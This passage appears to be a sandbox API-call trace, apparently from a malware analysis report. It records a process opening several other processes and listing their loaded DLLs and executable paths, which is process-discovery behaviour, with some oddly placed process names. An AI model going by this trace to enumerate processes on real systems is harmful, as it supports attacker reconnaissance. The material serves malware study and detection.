(in: hProcess=0x21c, hModule=0x7fef92c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\pnpts.dll" (normalized: "c:\\windows\\system32\\pnpts.dll")) returned 0x1d [0056.117] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef92a0000, lpmodinfo=0x2507d20, cb=0x18 | out: lpmodinfo=0x2507d20*(lpBaseOfDll=0x7fef92a0000, SizeOfImage=0x1d000, EntryPoint=0x7fef92a1a28)) returned 1 [0056.120] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef92a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="radardt.dll") returned 0xb [0056.123] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef92a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\radardt.dll" (normalized: "c:\\windows\\system32\\radardt.dll")) returned 0x1f [0056.126] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefbb00000, lpmodinfo=0x2509ee0, cb=0x18 | out: lpmodinfo=0x2509ee0*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0056.129] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefbb00000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0056.132] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefbb00000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0056.134] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef97b0000, lpmodinfo=0x250c0b0, cb=0x18 | out: lpmodinfo=0x250c0b0*(lpBaseOfDll=0x7fef97b0000, SizeOfImage=0x74000, EntryPoint=0x7fef97b66f0)) returned 1 [0056.137] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef97b0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="netprofm.dll") returned 0xc [0056.140] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef97b0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")) returned 0x20 [0056.143] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb3f0000, lpmodinfo=0x250e280, cb=0x18 | out: lpmodinfo=0x250e280*(lpBaseOfDll=0x7fefb3f0000, SizeOfImage=0x15000, EntryPoint=0x7fefb3f60d8)) returned 1 [0056.146] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb3f0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="nlaapi.dll") returned 0xa [0056.149] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb3f0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")) returned 0x1e [0056.152] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd070000, lpmodinfo=0x2510440, cb=0x18 | out: lpmodinfo=0x2510440*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0056.155] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd070000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0056.158] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd070000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0056.161] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcd70000, lpmodinfo=0x2512600, cb=0x18 | out: lpmodinfo=0x2512600*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0056.166] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcd70000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0056.169] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcd70000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0056.172] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa5d0000, lpmodinfo=0x25147c0, cb=0x18 | out: lpmodinfo=0x25147c0*(lpBaseOfDll=0x7fefa5d0000, SizeOfImage=0xc000, EntryPoint=0x7fefa5d602c)) returned 1 [0056.175] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa5d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="npmproxy.dll") returned 0xc [0056.178] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa5d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")) returned 0x20 [0056.181] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9200000, lpmodinfo=0x2516990, cb=0x18 | out: lpmodinfo=0x2516990*(lpBaseOfDll=0x7fef9200000, SizeOfImage=0xd000, EntryPoint=0x7fef9206fb0)) returned 1 [0056.184] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9200000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wdiasqmmodule.dll") returned 0x11 [0056.188] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9200000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wdiasqmmodule.dll" (normalized: "c:\\windows\\system32\\wdiasqmmodule.dll")) returned 0x25 [0056.191] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd1e0000, lpmodinfo=0x2518b70, cb=0x18 | out: lpmodinfo=0x2518b70*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0056.195] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd1e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0056.198] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd1e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0056.201] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdc80000, lpmodinfo=0x251ad30, cb=0x18 | out: lpmodinfo=0x251ad30*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0056.204] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdc80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0056.207] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdc80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0056.211] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd980000, lpmodinfo=0x251cf00, cb=0x18 | out: lpmodinfo=0x251cf00*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0056.214] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd980000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0056.217] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd980000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0056.220] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd830000, lpmodinfo=0x251f0c0, cb=0x18 | out: lpmodinfo=0x251f0c0*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0056.223] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0056.227] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0056.230] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd9e0000, lpmodinfo=0x2521290, cb=0x18 | out: lpmodinfo=0x2521290*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0056.234] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd9e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0056.237] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd9e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0056.240] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd820000, lpmodinfo=0x2523880, cb=0x18 | out: lpmodinfo=0x2523880*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0056.244] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd820000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0056.247] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd820000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0056.251] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x21c [0056.251] EnumProcessModules (in: hProcess=0x21c, lphModule=0x2527438, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2527438, lpcbNeeded=0x41eb20) returned 1 [0056.252] GetModuleInformation (in: hProcess=0x21c, hModule=0xb80000, lpmodinfo=0x25276a8, cb=0x18 | out: lpmodinfo=0x25276a8*(lpBaseOfDll=0xb80000, SizeOfImage=0x17000, EntryPoint=0xb814a1)) returned 1 [0056.252] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xb80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="commercial.exe") returned 0xe [0056.253] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xb80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Mail\\commercial.exe" (normalized: "c:\\program files (x86)\\windows mail\\commercial.exe")) returned 0x32 [0056.253] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x25298d0, cb=0x18 | out: lpmodinfo=0x25298d0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0056.253] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0056.254] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0056.254] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x252ba90, cb=0x18 | out: lpmodinfo=0x252ba90*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0056.254] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0056.255] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0056.255] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x252dc50, cb=0x18 | out: lpmodinfo=0x252dc50*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0056.255] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0056.256] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0056.256] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x252fe20, cb=0x18 | out: lpmodinfo=0x252fe20*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0056.266] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0056.267] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0056.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xba0) returned 0x21c [0056.267] EnumProcessModules (in: hProcess=0x21c, lphModule=0x2532530, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2532530, lpcbNeeded=0x41eb20) returned 1 [0056.268] GetModuleInformation (in: hProcess=0x21c, hModule=0x930000, lpmodinfo=0x25327a0, cb=0x18 | out: lpmodinfo=0x25327a0*(lpBaseOfDll=0x930000, SizeOfImage=0x17000, EntryPoint=0x9314a1)) returned 1 [0056.268] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x930000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="operamail.exe") returned 0xd [0056.268] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x930000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Microsoft.NET\\operamail.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\operamail.exe")) returned 0x32 [0056.269] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x25349c8, cb=0x18 | out: lpmodinfo=0x25349c8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0056.269] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0056.269] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0056.270] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x2536b88, cb=0x18 | out: lpmodinfo=0x2536b88*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0056.270] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0056.270] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0056.271] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x2538d48, cb=0x18 | out: lpmodinfo=0x2538d48*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0056.271] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0056.271] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0056.272] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x253af18, cb=0x18 | out: lpmodinfo=0x253af18*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0056.272] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0056.273] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0056.274] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c4) returned 0x21c [0056.274] EnumProcessModules (in: hProcess=0x21c, lphModule=0x253d640, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x253d640, lpcbNeeded=0x41eb20) returned 1 [0056.274] GetModuleInformation (in: hProcess=0x21c, hModule=0xb50000, lpmodinfo=0x253d8b0, cb=0x18 | out: lpmodinfo=0x253d8b0*(lpBaseOfDll=0xb50000, SizeOfImage=0x17000, EntryPoint=0xb514a1)) returned 1 [0056.275] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xb50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0056.275] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xb50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Sidebar\\mxslipstream.exe" (normalized: "c:\\program files\\windows sidebar\\mxslipstream.exe")) returned 0x31 [0056.275] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x253fae0, cb=0x18 | out: lpmodinfo=0x253fae0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0056.275] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0056.276] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0056.276] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x2541ca0, cb=0x18 | out: lpmodinfo=0x2541ca0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0056.276] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0056.277] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0056.277] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x2543e60, cb=0x18 | out: lpmodinfo=0x2543e60*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0056.277] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0056.278] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0056.278] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x2546030, cb=0x18 | out: lpmodinfo=0x2546030*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0056.279] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0056.279] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0056.280] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x574) returned 0x21c [0056.280] EnumProcessModules (in: hProcess=0x21c, lphModule=0x2548740, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2548740, lpcbNeeded=0x41eb20) returned 1 [0056.281] GetModuleInformation (in: hProcess=0x21c, hModule=0xd70000, lpmodinfo=0x25489b0, cb=0x18 | out: lpmodinfo=0x25489b0*(lpBaseOfDll=0xd70000, SizeOfImage=0x17000, EntryPoint=0xd714a1)) returned 1 [0056.281] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xd70000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="afr38.exe") returned 0x9 [0056.281] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xd70000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\afr38.exe" (normalized: "c:\\program files (x86)\\internet explorer\\afr38.exe")) returned 0x32 [0056.282] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x254abd0, cb=0x18 | out: lpmodinfo=0x254abd0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0056.282] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0056.282] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0056.282] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x254cd90, cb=0x18 | out: lpmodinfo=0x254cd90*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0056.283] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0056.283] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0056.283] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x254ef50, cb=0x18 | out: lpmodinfo=0x254ef50*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0056.284] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0056.284] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0056.285] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x2551120, cb=0x18 | out: lpmodinfo=0x2551120*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0056.285] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0056.286] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0056.286] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x21c [0056.286] EnumProcessModules (in: hProcess=0x21c, lphModule=0x2553848, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2553848, lpcbNeeded=0x41eb20) returned 1 [0056.287] GetModuleInformation (in: hProcess=0x21c, hModule=0x110000, lpmodinfo=0x2553ab8, cb=0x18 | out: lpmodinfo=0x2553ab8*(lpBaseOfDll=0x110000, SizeOfImage=0x17000, EntryPoint=0x1114a1)) returned 1 [0056.288] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x110000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="writer.exe") returned 0xa [0056.288] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x110000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files\\Common Files\\writer.exe" (normalized: "c:\\program files\\common files\\writer.exe")) returned 0x28 [0056.288] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x2555cc8, cb=0x18 | out: lpmodinfo=0x2555cc8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0056.288] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0056.289] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0056.289] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x2557e88, cb=0x18 | out: lpmodinfo=0x2557e88*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0056.289] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0056.290] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0056.290] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x255a048, cb=0x18 | out: lpmodinfo=0x255a048*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0056.290] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0056.291] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0056.291] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x255c218, cb=0x18 | out: lpmodinfo=0x255c218*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0056.292] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0056.292] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0056.293] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x530) returned 0x21c [0056.293] EnumProcessModules (in: hProcess=0x21c, lphModule=0x255e928, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x255e928, lpcbNeeded=0x41eb20) returned 1 [0056.295] GetModuleInformation (in: hProcess=0x21c, hModule=0x13f630000, lpmodinfo=0x255eb98, cb=0x18 | out: lpmodinfo=0x255eb98*(lpBaseOfDll=0x13f630000, SizeOfImage=0x2c000, EntryPoint=0x13f6457f0)) returned 1 [0056.295] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x13f630000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WMIADAP.EXE") returned 0xb [0056.295] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x13f630000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE" (normalized: "c:\\windows\\system32\\wbem\\wmiadap.exe")) returned 0x28 [0056.295] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x2560e10, 